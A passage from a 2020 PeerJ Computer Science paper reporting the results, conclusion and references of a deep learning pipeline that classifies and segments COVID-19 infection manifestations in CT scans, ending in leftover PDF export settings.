output of the all-class stream, that is, the single stream that was trained to segment all the classes of manifestations at the same time. To support subjective results with objective measures, we report in Table 6 the dice coefficient (DSC) and the mean Intersection over Union (IoU) attained by the all-class stream, each of the three specialized streams, and their average. Considering the performance of the specialized streams, which outperformed the single stream approach, we believe that this defines an accuracy-complexity trade-off, that is, in order to attain better DSC and IoU, the system needs to include multiple specialized streams. We also believe that given the COVID-19 pandemic management as an application, in which significant resources have already been invested, there is a higher priority for developing highly accurate systems over low-complexity systems. To compare the performance of the proposed approach with other models, we report the results for specific types of infection manifestations as well as the overall performance for all types of manifestations. Table 7 shows a manifestation-specific comparison between the performance of our model, namely, DeepLab-v3+ model with transfer learning from pulmonary nodule detection, and other models from the recent literature Table 5 Different performance metrics for the adopted multi-label classifier. We show the perfor- mance for individual labels as well as the overall performance. Class name Accuracy (%) Precision (%) Senstivity (%) F1-Score (%) Pleural effusion 91.31 83 90 86 Ground glass 89.46 91 80 85 Consolidation 93.72 88 93 90 Overall 87.2 87.3 87.6 87 El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 18/27 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ including previous research that adopted DeepLab-v3+. The comparison highlights the superiority of our approach consistently for the two types of manifestations. This represents approximately 41% and 290% increase in DCS of ground-glass opacities and consolidation, respectively, compared to the recent literature. For mIoU, the Figure 10 The output segmentation masks of the adopted deep models. The images in column 1 from (A) to (C) show the chest CT images of three scans. Column 2 from (D) to (F) shows the ground-truth masks for these three scans, where the white represents the consolidation, dark gray represents pleural effusion and light gray corresponds to ground-glass opacities. Column 3 from (G) to (I) depicts the segmentation results generated by our model for all classes where the red represents the consolidation, the green represents the pleural effusion, and the yellow represents the ground-glass opacities. The images in columns 3, 4, and 6 from (J) to (R) represent the output from the specialized stream that are trained to segment ground-glass opacities, pleural effusion, and the consolidation, respectively. Full-size DOI: 10.7717/peerj-cs.303/fig-10 Table 6 A comparison between the performance of each of the specialized streams as well as the all-class stream, with regards to dice coefficient (DSC) and mean Intersection over Union (mIoU). For all the streams, a DeepLab-v3+ model, with an Xception 65 as a feature extractor, is used. All-Class Stream 1: PE Stream 2: GGO Stream 3: Consolidation Multi-Stream Average DSC (%) 86.04 91.34 90.2 91.5 91.01 mIOU (%) 75.5 84.06 82.15 84.46 83.5 El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 19/27 http://dx.doi.org/10.7717/peerj-cs.303/fig-10 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ comparison yields an increase of approximately 77% and 500% in DCS of ground-glass opacities and consolidation, respectively. We further make a comparison that is not manifestation-specific, between the performance of the proposed approach and the recent literature. In Table 8, we demonstrate an increase of approximately 4.5% and 2.5% for mean intersection-over- union (mIoU) and dice coefficient, respectively, compared to the recent literature. Figure 11 depicts a subjective comparison using examples for the output segmentation Table 8 A quantitative comparison on the COVID-19 segmentation dataset between our segmentation method and other methods in the recent literature. The comparison considers DSC and mIoU. It also considers the overall performance on the three different types of infection manifes- tations, that is, it is not a manifestation-specific comparison. Method DSC (%) mIOU (%) U-Net + DL (Zhou, Canu & Ruan, 2020) 61.0 43.88 U-Net + FTL (Zhou, Canu & Ruan, 2020) 66.7 50.15 U-NET 512 × 512 (Amyar, Modzelewski & Ruan, 2020) 67.14 50.53 AU-Net + DL (Zhou, Canu & Ruan, 2020) 68.5 52.09 U-NET 256 × 256 (Amyar, Modzelewski & Ruan, 2020) 69.09 52.77 AU-Net + FTL (Zhou, Canu & Ruan, 2020) 69.1 52.78 Backbone + PPD + RA + EA (Fan et al., 2020) 73.9 58.6 JCS (Wu et al., 2020) 77.5 65.2 JCS‘ (Wu et al., 2020) 78.3 66.5 Amine (Amyar, Modzelewski & Ruan, 2020) 78.52 64.6 U-net (Chen, Yao & Zhang, 2020) 82 69.49 M–A (Chen, Yao & Zhang, 2020) 85 73.91 M–R (Chen, Yao & Zhang, 2020) 84 72.41 Ours method 86.04 75.5 Table 7 A quantitative comparison of manifestation-specific DSC and mIoU, for Ground-Glass Opacity and Consolidation, between our segmented method and other methods in the recent literature. Method DSC mIOU Ground-glass opacities DeepLabV3+ (stride = 8) (Fan et al., 2020) 0.375 0.230 DeepLabV3+ (stride = 16) (Fan et al., 2020) 0.443 0.284 FCN8s (Fan et al., 2020) 0.471 0.308 Semi-Inf-Net+FCN8s (Fan et al., 2020) 0.646 0.477 Ours (DeepLab-v3+ + exception-65) 0.902 0.8215 Consolidation DeepLabV3+ (stride = 8) (Fan et al., 2020) 0.117 0.062 DeepLabV3+ (stride = 16) (Fan et al., 2020) 0.188 0.103 FCN8s (Fan et al., 2020) 0.221 0.124 Semi-Inf-Net+FCN8s (Fan et al., 2020) 0.238 0.135 Ours (DeepLab-v3+ + exception-65) 0.915 0.8446 El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 20/27 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ masks on the COVID-19 validation set obtained using U-net (Chen, Yao & Zhang, 2020) and DeepLab-v3+ (ours). We also demonstrate less computational cost than the traditional test, the RT-PCR, and other diagnostic tools (Huang et al., 2020; Wu et al., 2020). We report this comparison in Table 9, which shows a 60% reduction in diagnosis/computational time per case. Table 10 summarizes the model hyper-parameters used in the three tasks that are accomplished by the proposed system. Figure 11 Segmentation output visualization results. (A) and (B) chest CT images of two scans. (C) and (D) ground-truth masks for these two scans, where the white represents the consolidation, dark gray represents pleural effusion and light gray corresponds to ground-glass opa- cities. (E) and (F) the outputs of the U-Net. (G) and (H) the segmentation results generated by our model. Full-size DOI: 10.7717/peerj-cs.303/fig-11 Table 10 A summary of hyper-parameters used in the proposed model. Task_no Steps/Epochs Learning rate Optimizer Momentum Dropout Weight decay Batch size Task 1 2,800 steps 0.01 Gradient descent – – – 100 Task 2 50 epochs 0.01 Adam – 0.5 – 64 Task 3 50 K steps 0.0001 SGD 0.9 – 0.00004 8 Table 9 A comparison between the proposed method and other diagnostic tools in the literature concerning the average diagnosis time per case. Method (Won et al., 2018) (Huang et al., 2020) (Wu et al., 2020) Ours Test Time 4 h 21.5 min 19 s 5.33 s El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 21/27 http://dx.doi.org/10.7717/peerj-cs.303/fig-11 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ CONCLUSION In this research, we proposed a multi-task pipeline for the recognition of COVID-19, and the classification and segmentation of related infection manifestations in medical scans. We are inspired by the emerging role that medical imaging-based diagnostics can play as a digital second opinion to manage the current pandemic. The proposed pipeline starts with a COVID-19 recognition stage. Towards this goal, we fine-tuned and Inception-v3 model which was pre-trained on ImageNet. We evaluated the performance of this model on two tasks, namely, the two-class problem of COVID-19/non-COVID-19 recognition, and the four-class problem of recognizing COVID-19 scans from other scans that correspond to normal, viral pneumonia, and bacterial pneumonia cases. We outperformed other techniques in the recent literature, consistently in both types of classification problems. To the best of our knowledge, we are also the first to highlight a potential advantage for multi-modal learning, that is, learning from X-rays and CT scans over learning from X-rays only. In the second stage, we addressed a problem that was not been addressed by the recent literature, namely, the identification of the probabilities of presence for different types of infection manifestations in medical scans. This stage was implemented using a multi-label CNN classifier, and we envisage its potential to serve in early detection of infection manifestations. It also complements the third stage which addresses the problem of computing binary masks for segmenting the regions corresponding to infection regions in CT scans. For effective segmentation, we adapted the knowledge from another domain, namely, pulmonary nodule segmentation. This approach resulted in an increase of approximately 2.5% and 4.5% for dice coefficient and mean intersection-over-union (mIoU), respectively, while requiring 60% less computational time, compared to the recent literature. All the stages of the proposed pipeline were trained and tested using widely adopted datasets, and evaluated using various objective measures. We also used data augmentation techniques to avoid over-fitting that might have occurred due to the relatively limited volume of available data. For further enhancement of the performance of the segmentation stage, we showed that using multiple streams can significantly improve the quality of the output masks, as measured by the DSC and mIoU, such that each stream is trained to segment a specific type of infection manifestations. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests Shimaa El-bana and Maha Sharkas declare that they have no competing interests. Ahmad Al-Kabbany is the Founder of VRapeutic, and is currently serving as a member of the Research & Development Department's team. El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 22/27 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ Author Contributions � Shimaa El-bana conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Ahmad Al-Kabbany conceived and designed the experiments, performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � Maha Sharkas conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Dataset and scripts are available at GitHub: https://github.com/shimaaelbana/Classification-and-Segmentation-of-infection- manifestations-in-COVID-19-scans. The datasets acquired for analysis are available at: 1. COVID-19 CT Segmentation Dataset: http://medicalsegmentation.com/COVID19/? fbclid=IwAR2uZZ9f0mBHHVF10hMhS0OQ82LMOxQ0YdMXBOc5lKKZYL1h1eNVF U_fUp. 2. The COVID-19 Image Data Collection Repository on GitHub: https://github.com/ ieee8023/COVID-chestxray-dataset. 3. The RSNA Pneumonia Detection Challenge Dataset: https://www.kaggle.com/c/rsna- pneumonia-detection-challenge. REFERENCES Ai T, Yang Z, Hou H, Zhan C, Chen C, Lv W, Tao Q, Sun Z, Xia L. 2020. Correlation of chest CT and RT-PCR testing in coronavirus disease 2019 (COVID-19) in China: a report of 1014 cases. Radiology 296(2):200642 DOI 10.1148/radiol.2020200642. Amyar A, Modzelewski R, Ruan S. 2020. Multi-task deep learning based ct imaging analysis for covid-19: classification and segmentation. MedRxiv DOI 10.1101/2020.04.16.20064709. Chan JF-W, Yuan S, Kok K-H, To KK-W, Chu H, Yang J, Xing F, Liu J, Yip CC-Y, Poon RW-S, Tsoi H-W, Lo SK-F, Chan K-H, Poon VK-M, Chan W-M, Ip JD, Cai J-P, Cheng VC-C, Chen H, Hui CK-M, Yuen K-Y. 2020. A familial cluster of pneumonia associated with the 2019 novel coronavirus indicating person-to-person transmission: a study of a family cluster. Lancet 395(10223):514–523 DOI 10.1016/S0140-6736(20)30154-9. Chen D, Jiang X, Hong Y, Wen Z, Wei S, Peng G, Wei X. 2020. Can chest CT features distinguish patients with negative from those with positive initial RT-PCR results for coronavirus disease (covid-19)? American Journal of Roentgenology 215:1–5 DOI 10.2214/AJR.20.23012. Chen G, Li C, Wei W, Jing W, Woźniak M, Blažauskas T, Damaševičius R. 2019. Fully convolutional neural network with augmented atrous spatial pyramid pool and fully connected fusion path for high resolution remote sensing image segmentation. Applied Sciences 9(9):1816. Chen L-C, Papandreou G, Schroff F, Adam H. 2017. Rethinking atrous convolution for semantic image segmentation. Available at https://arxiv.org/abs/1706.05587. El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 23/27 https://github.com/shimaaelbana/Classification-and-Segmentation-of-infection-manifestations-in-COVID-19-scans https://github.com/shimaaelbana/Classification-and-Segmentation-of-infection-manifestations-in-COVID-19-scans http://medicalsegmentation.com/COVID19/?fbclid=IwAR2uZZ9f0mBHHVF10hMhS0OQ82LMOxQ0YdMXBOc5lKKZYL1h1eNVFU_fUp http://medicalsegmentation.com/COVID19/?fbclid=IwAR2uZZ9f0mBHHVF10hMhS0OQ82LMOxQ0YdMXBOc5lKKZYL1h1eNVFU_fUp http://medicalsegmentation.com/COVID19/?fbclid=IwAR2uZZ9f0mBHHVF10hMhS0OQ82LMOxQ0YdMXBOc5lKKZYL1h1eNVFU_fUp https://github.com/ieee8023/COVID-chestxray-dataset https://github.com/ieee8023/COVID-chestxray-dataset https://www.kaggle.com/c/rsna-pneumonia-detection-challenge https://www.kaggle.com/c/rsna-pneumonia-detection-challenge http://dx.doi.org/10.1148/radiol.2020200642 http://dx.doi.org/10.1101/2020.04.16.20064709 http://dx.doi.org/10.1016/S0140-6736(20)30154-9 http://dx.doi.org/10.2214/AJR.20.23012 https://arxiv.org/abs/1706.05587 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ Chen L-C, Zhu Y, Papandreou G, Schroff F, Adam H. 2018. Encoder-decoder with atrous separable convolution for semantic image segmentation. In: Proceedings of the European Conference on Computer Vision (ECCV), New York: Springer International Publishing, 801–818. Chen X, Yao L, Zhang Y. 2020. Residual attention u-net for automated multi-class segmentation of covid-19 chest ct images. Available at https://arxiv.org/abs/2004.05645. Chollet F. 2017. Xception: deep learning with depthwise separable convolutions. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, Piscataway: IEEE, 1251–1258. Chu DKW, Pan Y, Cheng SMS, Hui KPY, Krishnan P, Liu Y, Ng DYM, Wan CKC, Yang P, Wang Q, Peiris M, Poon LLM. 2020. Molecular diagnosis of a novel coronavirus (2019-ncov) causing an outbreak of pneumonia. Clinical Chemistry 66(4):549–555 DOI 10.1093/clinchem/hvaa029. Çiçek Ö, Abdulkadir A, Lienkamp SS, Brox T, Ronneberger O. 2016. 3d u-net: learning dense volumetric segmentation from sparse annotation. In: International Conference on Medical Image Computing and Computer-Assisted Intervention, Berlin: Springer, 424–432. Cohen JP, Morrison P, Dao L. 2020. Covid-19 image data collection. Available at https://arxiv.org/ abs/2003.11597. Coronaviridae Study Group of the International Committee on Taxonomy of Viruses. 2020. The species severe acute respiratory syndrome-related coronavirus: classifying 2019-ncov and naming it sars-cov-2. Nature Microbiology 5:1. EL-Bana S, Al-Kabbany A, Sharkas M. 2020. A two-stage framework for automated malignant pulmonary nodule detection in CT scans. Diagnostics 10(3):131 DOI 10.3390/diagnostics10030131. Elharrouss O, Subramanian N, Al-Maadeed S. 2020. An encoder-decoder-based method for covid-19 lung infection segmentation. Available at https://arxiv.org/abs/2007.00861. Fan D-P, Zhou T, Ji G-P, Zhou Y, Chen G, Fu H, Shen J, Shao L. 2020. Inf-net: automatic covid- 19 lung infection segmentation from ct scans. MedRxiv DOI 10.1101/2020.04.22.20074948. Fang Y, Zhang H, Xie J, Lin M, Ying L, Pang P, Ji W. 2020. Sensitivity of chest CT for covid-19: comparison to RT-PCR. Radiology 296(2):200432 DOI 10.1148/radiol.2020200432. He J-L, Luo L, Luo Z-D, Lyu J-X, Ng M-Y, Shen X-P, Wen Z. 2020. Diagnostic performance between ct and initial real-time RT-PCR for clinically suspected 2019 coronavirus disease (covid-19) patients outside Wuhan, China. Respiratory Medicine 168:105980. Hope MD, Raptis CA, Shah A, Hammer MM, Henry TS. 2020. A role for ct in covid-19? What data really tell us so far. Lancet 395(10231):1189–1190 DOI 10.1016/S0140-6736(20)30728-5. Huang Z, Zhao S, Li Z, Chen W, Zhao L, Deng L, Song B. 2020. The battle against coronavirus disease 2019 (covid-19): emergency management and infection control in a radiology department. Journal of the American College of Radiology 17(6):710–716 DOI 10.1016/j.jacr.2020.03.011. Kingma DP, Ba J. 2014. Adam: a method for stochastic optimization. Available at https://arxiv.org/ pdf/1412.6980. Koonsanit K, Thongvigitmanee S, Pongnapang N, Thajchayapong P. 2017. Image enhancement on digital x-ray images using n-clahe. In: 2017 10th Biomedical Engineering International Conference (BMEiCON), Piscataway: IEEE, 1–4. Lai C-C, Shih T-P, Ko W-C, Tang H-J, Hsueh P-R. 2020. Severe acute respiratory syndrome coronavirus 2 (sars-cov-2) and corona virus disease-2019 (covid-19): the epidemic and the challenges. International Journal of Antimicrobial Agents 55:105924. El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 24/27 https://arxiv.org/abs/2004.05645 http://dx.doi.org/10.1093/clinchem/hvaa029 https://arxiv.org/abs/2003.11597 https://arxiv.org/abs/2003.11597 http://dx.doi.org/10.3390/diagnostics10030131 https://arxiv.org/abs/2007.00861 http://dx.doi.org/10.1101/2020.04.22.20074948 http://dx.doi.org/10.1148/radiol.2020200432 http://dx.doi.org/10.1016/S0140-6736(20)30728-5 http://dx.doi.org/10.1016/j.jacr.2020.03.011 https://arxiv.org/pdf/1412.6980 https://arxiv.org/pdf/1412.6980 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ Li K, Fang Y, Li W, Pan C, Qin P, Zhong Y, Liu X, Huang M, Liao Y, Li S. 2020a. CT image visual quantitative evaluation and clinical classification of coronavirus disease (covid-19). European Radiology 30(8):1–10 DOI 10.1007/s00330-020-06817-6. Li Q, Guan X, Wu P, Wang X, Zhou L, Tong Y, Ren R, Leung KSM, Lau EHY, Wong JY, Xing X, Xiang N, Wu Y, Li C, Chen Q, Li D, Liu T, Zhao J, Liu M, Tu W, Chen C, Jin L, Yang R, Wang Q, Zhou S, Wang R, Liu H, Luo Y, Liu Y, Shao G, Li H, Tao Z, Yang Y, Deng Z, Liu B, Ma Z, Zhang Y, Shi G, Lam TTY, Wu JT, Gao GF, Cowling BJ, Yang B, Leung GM, Feng Z. 2020b. Early transmission dynamics in Wuhan, China, of novel coronavirus—infected pneumonia. New England Journal of Medicine 382(13):1199–1207 DOI 10.1056/NEJMoa2001316. Liu X, Faes L, Kale AU, Wagner SK, Fu DJ, Bruynseels A, Mahendiran T, Moraes G, Shamdas M, Kern C, Ledsam JR, Schmid MK, Balaskas K, Topol EJ, Bachmann LM, Keane PA, Denniston AK. 2019. A comparison of deep learning performance against health-care professionals in detecting diseases from medical imaging: a systematic review and meta-analysis. Lancet Digital Health 1(6):e271–e297 DOI 10.1016/S2589-7500(19)30123-2. Loey M, Smarandache FM, Khalifa NE. 2020. Within the lack of chest covid-19 x-ray dataset: a novel detection model based on gan and deep transfer learning. Symmetry 12(4):651 DOI 10.3390/sym12040651. Mahdianpari M, Salehi B, Rezaee M, Mohammadimanesh F, Zhang Y. 2018. Very deep convolutional neural networks for complex land cover mapping using multispectral remote sensing imagery. Remote Sensing 10(7):1119 DOI 10.3390/rs10071119. Narin A, Kaya C, Pamuk Z. 2020. Automatic detection of coronavirus disease (covid-19) using x-ray images and deep convolutional neural networks. Available at https://arxiv.org/abs/2003. 10849. Nasrullah N, Sang J, Alam MS, Mateen M, Cai B, Hu H. 2019. Automated lung nodule detection and classification using deep learning combined with multiple strategies. Sensors 19(17):3722 DOI 10.3390/s19173722. Ozkaya U, Ozturk S, Barstugan M. 2020. Coronavirus (covid-19) classification using deep features fusion and ranking technique. Available at https://arxiv.org/abs/2004.03698. Patel BN, Rosenberg L, Willcox G, Baltaxe D, Lyons M, Irvin J, Rajpurkar P, Rajpurkar T, Gupta R, Halabi S, Langlotz C, Lo E, Mammarappallil J, Mariano AJ, Riley G, Seekins J, Shen L, Zucker E, Lungren MP. 2019. Human-machine partnership with artificial intelligence for chest radiograph diagnosis. NPJ Digital Medicine 2(1):1–10 DOI 10.1038/s41746-018-0076-7. Perez F, Vasconcelos C, Avila S, Valle E. 2018. Data augmentation for skin lesion analysis. In: OR 2.0 Context-Aware Operating Theaters, Computer Assisted Robotic Endoscopy, Clinical Image-Based Procedures, and Skin Image Analysis. Berlin: Springer, 303–311. Polat H, Danaei Mehr H. 2019. Classification of pulmonary ct images by using hybrid 3d-deep convolutional neural network architecture. Applied Sciences 9(5):940 DOI 10.3390/app9050940. Ronneberger O, Fischer P, Brox T. 2015. U-net: convolutional networks for biomedical image segmentation. In: International Conference on Medical Image Computing and Computer-Assisted Intervention. Berlin: Springer, 234–241. Sethy PK, Behera SK. 2020. Detection of coronavirus disease (covid-19) based on deep features. International Journal of Mathematical, Engineering and Management Sciences 5(4):643–651 DOI 10.33889/IJMEMS.2020.5.4.052. Sharfstein JM, Becker SJ, Mello MM. 2020. Diagnostic testing for the novel coronavirus. JAMA 323(15):1437 DOI 10.1001/jama.2020.3864. El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 25/27 http://dx.doi.org/10.1007/s00330-020-06817-6 http://dx.doi.org/10.1056/NEJMoa2001316 http://dx.doi.org/10.1016/S2589-7500(19)30123-2 http://dx.doi.org/10.3390/sym12040651 http://dx.doi.org/10.3390/rs10071119 https://arxiv.org/abs/2003.10849 https://arxiv.org/abs/2003.10849 http://dx.doi.org/10.3390/s19173722 https://arxiv.org/abs/2004.03698 http://dx.doi.org/10.1038/s41746-018-0076-7 http://dx.doi.org/10.3390/app9050940 http://dx.doi.org/10.33889/IJMEMS.2020.5.4.052 http://dx.doi.org/10.1001/jama.2020.3864 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ Shen J, Zhang CJ, Jiang B, Chen J, Song J, Liu Z, He Z, Wong SY, Fang P-H, Ming W-K. 2019. Artificial intelligence versus clinicians in disease diagnosis: systematic review. JMIR Medical Informatics 7(3):e10010 DOI 10.2196/10010. Simonyan K, Zisserman A. 2014. Two-stream convolutional networks for action recognition in videos. In: Advances in Neural Information Processing Systems. 568–576. Song Y, Zheng S, Li L, Zhang X, Zhang X, Huang Z, Chen J, Zhao H, Jie Y, Wang R, Chong Y, Shen J, Zha Y, Yang Y. 2020. Deep learning enables accurate diagnosis of novel coronavirus (covid-19) with ct images. MedRxiv DOI 10.1101/2020.02.23.20026930. Szegedy C, Vanhoucke V, Ioffe S, Shlens J, Wojna Z. 2016. Rethinking the inception architecture for computer vision. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. 2818–2826. Tahamtan A, Ardebili A. 2020. Real-time RT-PCR in covid-19 detection: issues affecting the results. Expert Review of Molecular Diagnostics 20(5):453–454 DOI 10.1080/14737159.2020.1757437. Wang D, Hu B, Hu C, Zhu F, Liu X, Zhang J, Wang B, Xiang H, Cheng Z, Xiong Y, Zhao Y, Li Y, Wang X, Peng Z. 2020. Clinical characteristics of 138 hospitalized patients with 2019 novel coronavirus-infected pneumonia in Wuhan, China. JAMA 323(11):1061–1069 DOI 10.1001/jama.2020.1585. Wang L, Wong A. 2020. Covid-net: a tailored deep convolutional neural network design for detection of covid-19 cases from chest radiography images. Available at https://arxiv.org/abs/2003.09871. Won J, Lee S, Park M, Kim TY, Park MG, Choi BY, Kim D, Chang H, Kim VN, Lee CJ. 2018. Development of a laboratory-safe and low-cost detection protocol for sars-cov-2 of the coronavirus disease 2019 (covid-19). Molecular Cell 70(1):72–82 DOI 10.1016/j.molcel.2018.03.004. Wu JT, Leung K, Leung GM. 2020. Nowcasting and forecasting the potential domestic and international spread of the 2019-ncov outbreak originating in Wuhan, China: a modelling study. Lancet 395(10225):689–697 DOI 10.1016/S0140-6736(20)30260-9. Wu Y-H, Gao S-H, Mei J, Xu J, Fan D-P, Zhao C-W, Cheng M-M. 2020. JCS: an explainable covid-19 diagnosis system by joint classification and segmentation. Available at https://arxiv.org/abs/2004.07054. Xia X, Xu C, Nan B. 2017. Inception-v3 for flower classification. In: 2017 2nd International Conference on Image, Vision and Computing (ICIVC). Piscataway: IEEE, 783–787. Ye Z, Zhang Y, Wang Y, Huang Z, Song B. 2020. Chest CT manifestations of new coronavirus disease 2019 (covid-19): a pictorial review. European Radiology 30(8):1–9 DOI 10.1007/s00330-020-06801-0. Zhang B, Wang L, Wang Z, Qiao Y, Wang H. 2016. Real-time action recognition with enhanced motion vector CNNS. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. 2718–2726. Zhao J, Zhang Y, He X, Xie P. 2020. Covid-ct-dataset: a CT scan dataset about covid-19. Available at https://arxiv.org/abs/2003.13865. Zheng C, Deng X, Fu Q, Zhou Q, Feng J, Ma H, Liu W, Wang X. 2020. Deep learning-based detection for covid-19 from chest ct using weak label. MedRxiv DOI 10.1109/TMI.2020.2995965. Zhou T, Canu S, Ruan S. 2020. An automatic covid-19 CT segmentation based on u-net with attention mechanism. Available at https://arxiv.org/abs/2004.06673. El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 26/27 http://dx.doi.org/10.2196/10010 http://dx.doi.org/10.1101/2020.02.23.20026930 http://dx.doi.org/10.1080/14737159.2020.1757437 http://dx.doi.org/10.1001/jama.2020.1585 https://arxiv.org/abs/2003.09871 http://dx.doi.org/10.1016/j.molcel.2018.03.004 http://dx.doi.org/10.1016/S0140-6736(20)30260-9 https://arxiv.org/abs/2004.07054 http://dx.doi.org/10.1007/s00330-020-06801-0 https://arxiv.org/abs/2003.13865 http://dx.doi.org/10.1109/TMI.2020.2995965 https://arxiv.org/abs/2004.06673 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ Zhou Z, Siddiquee MMR, Tajbakhsh N, Liang J. 2019. Unet++: redesigning skip connections to exploit multiscale features in image segmentation. IEEE Transactions on Medical Imaging 39:1856–1867 DOI 10.1109/TMI.2019.2959609. Zu ZY, Jiang MD, Xu PP, Chen W, Ni QQ, Lu GM, Zhang LJ. 2020. Coronavirus disease 2019 (covid-19): a perspective from China. Radiology 296(2):200490 DOI 10.1148/radiol.2020200490. Zuiderveld K. 1994. Graphics gems IV: contrast limited adaptive histogram equalization. Cambridge: Academic Press Professional, Inc., 474–485. El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 27/27 http://dx.doi.org/10.1109/TMI.2019.2959609 http://dx.doi.org/10.1148/radiol.2020200490 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ A multi-task pipeline with specialized streams for classification and segmentation of infection manifestations in COVID-19 scans ... Introduction Results and discussion Conclusion References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) 